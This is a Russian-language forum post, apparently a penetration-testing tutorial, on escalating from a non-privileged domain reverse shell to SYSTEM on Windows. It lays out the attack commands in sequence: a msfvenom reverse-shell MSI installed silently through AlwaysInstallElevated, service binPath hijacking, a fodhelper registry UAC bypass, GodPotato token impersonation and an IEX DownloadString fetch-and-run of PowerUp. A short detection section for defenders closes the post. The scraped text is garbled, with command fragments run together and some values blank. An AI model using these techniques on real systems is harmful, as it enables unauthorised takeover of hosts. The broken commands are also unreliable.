![]() |
https://forum.antichat.xyz/attachmen...30573b40fd.png
Ты получил reverse shell от непривилегированного пользователя домена. Код:
whoamiКод:
CORP\j.smithКод:
whoami /privКод:
EnabledПовышение привилегий Windows - это путь от этой точки к SYSTEM или Domain Admin. Не через одну волшебную команду, а через последовательную эксплуатацию мисконфигураций, злоупотребление токенами и обход механизмов вроде UAC - причём большинство этих техник работают исключительно встроенными средствами Windows, что подробно разобрано в руководстве по living off the land атакам. В MITRE ATT&CK это целая тактика TA0004 (Privilege Escalation) - 14 техник и 89 подтехник, одна из самых жирных категорий матрицы. Русскоязычные материалы по теме обычно заканчиваются на разведке: Код:
systeminfoКод:
whoami /privКод:
net userРазведка после получения шелла: что искать и в каком порядке Прежде чем бросаться запускать WinPEAS, стоит понять логику приоритизации. На реальном engagement время ограничено, и проверять всё подряд - роскошь. Вот порядок, которым я пользуюсь на практике: Первый приоритет - привилегии текущего токена. Код:
whoami /privКод:
SeImpersonatePrivilegeКод:
SeAssignPrimaryTokenPrivilegeВторой приоритет - сервисы с кривыми разрешениями. Код:
sc qcКод:
sc sdshowКод:
Get-ModifiableServiceКод:
SERVICE_CHANGE_CONFIGТретий приоритет - UAC bypass. Актуален, когда ты уже в группе локальных администраторов, но сидишь в medium integrity level. UAC не даёт выполнить привилегированные действия без подтверждения, но существуют десятки способов обойти это ограничение без GUI-взаимодействия. Четвёртый приоритет - ядерные эксплойты. Проверяй через Код:
systeminfoКод:
wmic qfeЭксплуатация мисконфигураций служб Windows Мисконфигурации Windows - хлеб и масло локального повышения привилегий. В отличие от kernel exploits, они не зависят от версии ОС и не вызывают BSOD. По MITRE ATT&CK это подпадает под Hijack Execution Flow (T1574). Unquoted Service Path Классика, которую находят на каждом втором внутреннем пентесте. Если путь к бинарю сервиса содержит пробелы и не заключён в кавычки, Windows будет разрешать путь поэтапно. Путь Код:
C:\Program Files\Custom App\service.exe
Код:
C:\Program Files\Код:
Custom.exeПоиск уязвимых сервисов через cmd: Код:
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v "\""Код:
wmicКод:
Get-WmiObject win32_service | Where-Object {$.PathName -notlike '"' -and $.PathName -like ' ' -and $_.PathName -notlike 'C:\Windows\'} | Select Name, PathName, StartModeКод:
Get-UnquotedServiceКод:
icacls "C:\Program Files\Custom App"Код:
(W)Код:
(M)Слабые DACL на сервисах Более опасная и менее известная мисконфигурация - когда непривилегированный пользователь может модифицировать конфигурацию сервиса. Проверяется через Код:
accesschk.exeКод:
Get-ModifiableServiceКод:
SERVICE_ALL_ACCESSКод:
SERVICE_CHANGE_CONFIGКод:
UsersКод:
Authenticated UsersЭксплуатация простая: Код:
sc config binPath= "C:\temp\payload.exe"Код:
sc stopКод:
sc startWritable Service Binaries Третий вариант: сам бинарь сервиса доступен на запись. Проверка - Код:
icacls "C:\path\to\service.exe"Код:
UsersКод:
(M)Код:
(F)AlwaysInstallElevated Отдельная мисконфигурация, не связанная с сервисами. Если в реестре установлены оба ключа Код:
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevatedКод:
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevatedКод:
1Код:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedКод:
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o shell.msiКод:
msiexec /qn /i shell.msiКод:
/quietКод:
/qnКод:
/qnПовышение привилегий через токены Windows: от SeImpersonatePrivilege до SYSTEM Access Token Manipulation (T1134) и Token Impersonation/Theft (T1134.001) по MITRE ATT&CK - одни из самых результативных техник повышения привилегий Windows. Суть: каждый процесс в Windows работает в определённом security context, который задаётся токеном доступа. Если можешь украсть или имперсонировать токен привилегированного процесса - получаешь его привилегии. Как работают токены Windows При входе пользователя в систему Local Security Authority (LSA) создаёт access token: SID пользователя, SID всех его групп, список привилегий и integrity level. Токен наследуется каждым процессом, запущенным пользователем. Два типа токенов: primary (назначается процессу) и impersonation (позволяет потоку временно работать в другом security context). Ключевая привилегия для атак на токены - Код:
SeImpersonatePrivilegeКод:
LOCAL SERVICEКод:
NETWORK SERVICEPotato-атаки: эволюция и практика Potato-семейство - набор техник, эксплуатирующих Код:
SeImpersonatePrivilegeJuicyPotato работал через злоупотребление COM-серверами (T1559.001) и BITS-сервисом. Указываешь CLSID COM-объекта, который стартует от SYSTEM, и перенаправляешь аутентификацию на свой локальный listener. Ограничение: не работает на Windows Server 2019+ / Windows 10 1809+. Microsoft изменил поведение RPCSS - OXID resolution теперь всегда идёт на 127.0.0.1:135, и атакующий не может перенаправить его на произвольный локальный порт. RoguePotato обошёл это через socat/redirector на внешнем хосте атакующего: он принимает запрос OXID resolution с порта 135 и возвращает подконтрольный response с указанием произвольного endpoint. GodPotato - актуальная реализация для Windows Server 2019/2022 и Windows 10/11. Использует RPC/DCOM через CoGetInstanceFromIStorage и NTLM-релей на локальный named pipe: специально сконструированный RPC-запрос принуждает SYSTEM-процесс к NTLM-аутентификации на named pipe атакующего, после чего вызывается Код:
ImpersonateNamedPipeClientКод:
GodPotato.exe -cmd "cmd /c whoami"Код:
nt authority\systemhttps://forum.antichat.xyz/attachmen...6711159986.png Перед запуском любого Potato-инструмента убедись, что Код:
SeImpersonatePrivilegeКод:
whoami /privКод:
AdjustTokenPrivilegesКод:
whoami /privКод:
SeImpersonatePrivilegeПрямая кража токенов Если у тебя уже есть административные права на хосте, но нужен SYSTEM - можно утянуть токен напрямую у процесса, работающего от SYSTEM. Код:
lsass.exeКод:
winlogon.exeКод:
services.exeКод:
psКод:
steal_tokenКод:
steal_tokenКод:
OpenProcessКод:
OpenProcessTokenКод:
DuplicateTokenExКод:
CreateProcessWithTokenWUAC bypass: методы обхода контроля учётных записей Bypass User Account Control (T1548.002) - одна из самых задокументированных подтехник в MITRE ATT&CK. На странице T1548.002 перечислены десятки APT-групп и семейств малвари: от APT29 и LockBit до Cobalt Strike и Sliver. Это не теоретическая угроза - это стандартный шаг в kill chain. Почему UAC - не security boundary Microsoft официально позиционирует UAC не как security boundary, а как «удобство» (convenience feature). Обходы UAC формально не считаются уязвимостями и часто не получают CVE. Именно поэтому многие bypass-методы живут годами без исправлений. Что делает её скорее формальной, чем реальной защитой. UAC оперирует integrity levels: Low, Medium, High, System. Пользователь из группы администраторов по умолчанию работает на Medium integrity. Для привилегированных операций нужно повысить integrity до High - тут UAC показывает диалог подтверждения. Bypass-техники позволяют перейти от Medium к High без этого диалога. Fodhelper bypass По данным MITRE ATT&CK, fodhelper-метод используется группами Earth Lusca, малварью KOCTOPUS (LazyScripter, G0140), Raspberry Robin и Saint Bot (Saint Bear, G1031). Один из самых надёжных UAC bypass на Windows 10/11. Механизм: Код:
fodhelper.exeбинарь Microsoft с автоматическим повышением привилегий (Features On Demand Helper). При запуске он читает ключ реестра Код:
HKCU\Software\Classes\ms-settings\shell\open\commandКод:
fodhelper.exeКод: Код:
reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "C:\temp\payload.exe" /fКод:
reg delete HKCU\Software\Classes\ms-settings\shell\open\command /fEventvwr bypass Аналогичный принцип, но через Код:
eventvwr.exeКод:
HKCU\Software\Classes\mscfile\shell\open\commandКод:
ms-settingsКод:
mscfileCMSTPLUA COM-объект Более продвинутый метод, замеченный у Avaddon, BADHATCH, LockBit 3.0 и группы Medusa (T1548.002). Вместо манипуляции реестром используется COM-объект Код:
CMSTPLUAКод:
ICMLuaUtilКод:
ShellExecЧто не работает на свежих билдах На Windows 11 23H2+ и Windows Server 2025 часть bypass-методов уже мертва. DLL hijacking в Код:
wusa.exeКод:
sdclt.exeDLL Hijacking в контексте повышения привилегий Hijack Execution Flow: DLL (T1574.001) - техника, которая одновременно закрывает задачи persistence, privilege escalation и defense evasion. Принцип: Windows при загрузке DLL следует определённому порядку поиска (DLL Search Order). Если привилегированный процесс ищет DLL, не находит её в ожидаемом месте, а у атакующего есть право записи в одну из директорий поиска - можно подложить свою DLL. На практике я чаще всего встречаю этот вектор в связке с кастомным ПО. Разработчики ставят приложение в Код:
C:\CustomApp\Код:
C:\CustomApp\Код:
UsersОбнаружение: Process Monitor (procmon) от Sysinternals с фильтром Код:
Result = NAME NOT FOUNDКод:
Path ends with .dllhttps://forum.antichat.xyz/attachmen...6711272681.png Автоматизация: WinPEAS, PowerUp и Seatbelt На реальном engagement ручная проверка каждого вектора занимает часы. Автоматизированные инструменты ускоряют разведку, но важно понимать, что именно они проверяют - и что пропускают. WinPEAS - самый полный инструмент для автоматизированного аудита мисконфигураций. Запуск: Код:
winPEASx64.exeКод:
winPEASx64.exe > output.txtPowerUp (модуль PowerSploit) - работает из PowerShell, что удобно, когда нет возможности загрузить бинарь. Ключевая функция - Код:
Invoke-AllChecksКод:
IEX (New-Object Net.WebClient).DownloadString('http:///PowerUp.ps1')Код:
Invoke-AllChecksSeatbelt от SpecterOps - ориентирован на сбор данных о security posture хоста. Менее агрессивен, чем WinPEAS, реже триггерит антивирус. Запуск: Код:
Seatbelt.exe -group=allBeRoot - лёгкая альтернатива, проверяющая основные векторы: unquoted paths, writable services, AlwaysInstallElevated, scheduled tasks с writable-путями. Менее детальный вывод, зато быстрее работает на слабых машинах. Требования к окружению: Windows 7+ / Server 2008 R2+, доступ к cmd.exe или powershell.exe, возможность загрузить бинарь на хост (или скрипт PowerShell в память). На hardened-окружениях с AppLocker или WDAC запуск бинарей из пользовательских директорий может быть заблокирован - тогда используй PowerShell-варианты или обходи AppLocker через Код:
msbuild.exeКод:
installutil.exeПорядок действий: от шелла до SYSTEM Собираем всё в практический workflow. Предположим, ты получил reverse shell от Код:
CORP\j.smith📚 Часть контента скрыта. Этот материал доступен участникам сообщества с рангом One Level или выше Получить доступ просто — достаточно проявить активность на форуме Детектирование и защита от Windows privilege escalation техник Понимание атаки невозможно без понимания защиты. Вот что реально работает на стороне blue team: Мониторинг реестра для UAC bypass: через Sysmon Event ID 12/13/14 мониторь создание и модификацию подключей Код:
HKCU\Software\Classes\\shell\open\commandКод:
Код:
ms-settingsКод:
mscfileКод:
FolderКод:
exefilehttps://forum.antichat.xyz/attachmen...6711289647.png Аудит привилегий сервисных аккаунтов: регулярно проверяй, кому назначен Код:
SeImpersonatePrivilegeКод:
LOCAL SERVICEDACL-аудит на сервисах: через Код:
sc sdshowКод:
SERVICE_CHANGE_CONFIGОграничение автоэлевации UAC: установи UAC на максимальный уровень ("Always Notify", Код:
ConsentPromptBehaviorAdmin=2AppLocker / WDAC: блокировка запуска неподписанных бинарей из пользовательских директорий ( Код:
%TEMP%Код:
%APPDATA%Код:
DownloadsКод:
msiexec.exeВопрос к читателям На engagement-ах последнего года GodPotato стабильно отрабатывает на Windows Server 2022 с Код:
SeImpersonatePrivilegeКод:
SweetPotatoКод:
-clsid |
| Время: 09:44 |